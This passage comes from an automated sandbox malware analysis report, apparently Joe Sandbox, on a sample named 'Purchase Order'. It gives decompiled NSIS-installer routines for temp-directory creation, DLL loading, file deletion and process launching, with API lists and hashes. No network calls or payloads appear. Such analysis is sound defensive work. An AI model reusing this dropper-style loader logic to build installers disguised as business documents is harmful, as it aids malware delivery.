Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
%s%S.dll, xrefs: 004068E6
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 3449924974-2382934351
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00405f7d
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F14
C:\, xrefs: 00405F1A, 00405F1F, 00405F25, 00405F66, 00405F6C, 00405F74, 00405F7C

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\$C:\Users\user~1\AppData\Local\Temp\
API String ID: 3248276644-1077792641
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406061

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user~1\AppData\Local\Temp
API String ID: 1892508949-3107243751
Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00405C01(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406008(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405c02
0x00405c0d
0x00405c12
0x00405c42
0x00000000
0x00405c42
0x00405c19
0x00405c1a
0x00405c24
0x00405c1c
0x00405c1c
0x00405c1c
0x00405c2c
0x00405c38
0x00405c3c
0x00405c3c
0x00000000
0x00405c2e
0x00000000
0x00405c30

APIs

Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C1C
DeleteFileW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C24
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A

Uniqueness

Uniqueness Score: -1.00%

Function 004069B5 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069B5(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406946(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x004069c6
0x004069dd
0x004069d1
0x004069db
0x004069db
0x004069e8
0x004069f4

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069DB
GetExitCodeProcess.KERNELBASE ref: 004069E8

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 5001a44abd0e5b0949431453b9a2c42ce6d4f473903e6ae1ef305ee8f225f71a
Instruction ID: f5f2e02d25af80b97bb350a16654da7f97250589dc800b1049f4071f8343982b
Opcode Fuzzy Hash: 5001a44abd0e5b0949431453b9a2c42ce6d4f473903e6ae1ef305ee8f225f71a
Instruction Fuzzy Hash: 0CE0D8B1A00118FBDB109F54DE05E9E7B6EDF44750F110033FA01B6590D7B19E25DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b29
0x00405b49
0x00405b51
0x00405b56
0x00000000
0x00405b5c
0x00405b60

APIs

CreateProcessW.KERNELBASE ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
